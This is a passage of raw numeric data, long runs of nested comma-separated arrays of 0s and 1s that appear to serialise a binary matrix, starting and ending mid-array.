0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,1,1,0,0,0,1,0,0,0,1,0],[1,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,1,1,1,1,1,0,0,1,0,1,1,0,0,1,1,1,0,1,0,1,0,1,1,0,0,1,0,1,0,0,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,1,0,0,1,1,1,1,1,0,0,1,1,0,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,1,0,0,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,1,1,1,1,1,1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0],[1,1,1,1,0,1,1,0,1,1,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,0,1,0,1,1,0,1,1,0,1,1,0,1,1,0,0,0,1,1,1,1,0,1,0,1,1,1,0,1,0,0,0,1,0,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,1,1,0,0,0,1,1,0,1,0,1,1,0,0,0,1,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,0,0],[0,1,0,0,0,1,0,0,0,1,0,1,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,1,1,0,1,0,0,0,0,1,1,1,0,0,1,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,0,0,1,1,0,0],[1,0,0,0,1,1,0,0,1,0,1,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,0,1,0,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,1,1,1,1,0,1,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,0,1,1,1,1,1,0,0,1,0,1,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,1,0,1,0,0,0,1,1,0,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,1,0,1,1],[0,1,0,1,1,0,1,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,1,0,1,1,1,0,0,0,1,1,1,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,0,1,0,
0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1,1,1,1,0,1,1,1,1,0,1,0,1,1,1,0,0,1,1,0,1,0,0,0],[1,1,1,1,1,0,1,0,1,1,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,1,0,0,1,1,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,0,1,0,1,0,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,1,0,1,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0],[1,1,0,1,1,0,0,0,0,1,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,1,0,0,1,0,0,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,1,1,0,1,0,0,1,1,0,1,1,1,0,0,1,1,1,0,1,0,0,1,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,1,1,1,1,0,1,1,1,0,0,1,0],[1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,0,1,1,0,1,1,1,1,1,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,0,1,1,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,0,1,1],[1,0,1,1,1,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,0,0,1,1,1,0,0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,1,0,1,0,1,1,0,0,1,1,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,0,1,0,0],[0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,
1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,0],[0,0,1,0,0,1,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,1,0,0,0,1,0,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,1,0,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1],[1,0,1,1,1,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,1,0,0,1,0,1,0,0,1,0,1,0,0,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,1,1,0,0,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,1,1,1,0,1,1,1,1,0,0,1,1,0,0,0,0,1],[1,0,0,1,1,1,0,1,0,1,0,0,0,0,1,1,0,1,0,1,0,0,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,0,1,1,0,1,1,1,0,0,0,1,0,1,1,0,1,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,1,1,0,0,0,0],[0,1,1,0,0,1,0,0,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,0,0,1,1,0,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,0,1,1,1,1,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,0,1,1,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1],[0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,0,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1,1,0,0,1,1,0,0,0,0,1,1,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,1,0,1,0,1,0,1,0,1,1,
0,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1,0,0,1,0,1,1,1,0,0,0],[1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,1,0,0,1,1,1,0,0,0,1,1,1,0,0,1,1,0,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,1,1],[0,0,1,1,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,0,0,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,1,1,0,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,1,1,0,1,1,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,0,0,0,1,1,0,0,1,1,0,1,1,0,1,1,0,1,0,0,0,1,0,0,1],[1,0,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,0,0,1,1,1,0,0,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,0,1,1,1,1],[0,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,1,0,1,0,1,0,0,0,1,1,1,1,0,0,1,0,1,1,0,0,0,0,1,1,1,0,0,0,0,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,0,0,1,0,1,1,0,0,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,0,1,1,0,0,1,0,1,0],[0,0,1,1,0,0,0,1,1,0,1,0,0,1,1,0,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,1,0,0,1,0,1,0,0,1,1,1,1,0,1,1,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,1,1,0,1,1,1,0,
1,0,0,1,1,0,1,1,1,1,1,1,0,0,0,1,0,1,1,1,0,0,0,1,0,1,0,0,0,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,0],[1,0,0,0,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,1,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,1,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,1,1,1,1,1,1,0,0,0,0,1,0,0,1,0,1,1,1,0,1,0,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,1,0,0,1],[0,0,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,1,1,0,1,1,0,1,0,1,0,0,0,0,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,1,0,1,0,1,0,1,0,0,1,0,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,1,1,1,1,0,1,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,1,0,0,0,1,0,1,0,1,0,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,1,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,1,1,0,1,1,1,0],[1,1,1,0,1,0,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,0,1,1,1],[1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1,0,0,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,1,1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,0,1,0,0,1,1,1,1,1,0,1,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0],[1,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,1,1,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,
0,0,1,1,1,0,0,0,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,0,1,1,1,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,1,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,1,0],[1,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,1,1,0,0,0,0,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,1,1,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,0,0,0,1,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0],[0,1,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,1,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,1,1,0,1,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0],[0,1,1,1,0,0,1,0,1,1,0,0,1,1,1,1,1,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,1,0,1,1,0,1,0,1,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,1,0,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,1,0,0,1,0,1,0,0,1,0,1,1,1,0,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,0,0],[1,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,1,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0],[0,1,0,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,1,0,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,1,1,1,1,0,0,0,1,1,1,1,0,0,0,0,
0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,1,0,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,1,0,1,0,1,1,1,0,0,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,0,0,1,1,1,0,0],[0,0,0,0,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,0,1,0,1,1,0,0,0,1,0,1,1,0,1,0,0,1,0,0,0,1,0,1,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,1,0,0,0,0,1,1,0,1,0,1,0,0,1,0,0,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,0,1],[1,0,0,0,1,0,0,1,1,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1,0,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,1,1,0,0,1,0,0,1,1,1,1],[0,0,0,1,0,0,0,0,1,1,1,0,1,0,0,1,1,1,0,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,1,1,0,0,0,1,0,1,0,0,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,1,0,1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,0,1,1,0,0,0,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,0,1,1],[0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,1,1,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,1,1,1,0,1,1,0,1,0,1,1,1,1,1,1,1,1,0,1,0,0,1,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,1,0,0,1,0,1,1,0,0,0,1,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,1],[0,1,0,1,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,1,0,0,0,1,0,0,1,
1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,1,0,1,1,1,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,0,0,0],[1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,1,1,1,1,0,0,1,0,1,0,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,0,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,1,1,0,1,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0],[0,0,1,1,1,0,0,0,0,0,1,1,0,0,1,1,0,1,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,0,1,1,1,0,1,1,0,1,1,0,0,1,1,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,1,1,1,0,0,1,0,1,0,0,1,0,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,1,0,0,0,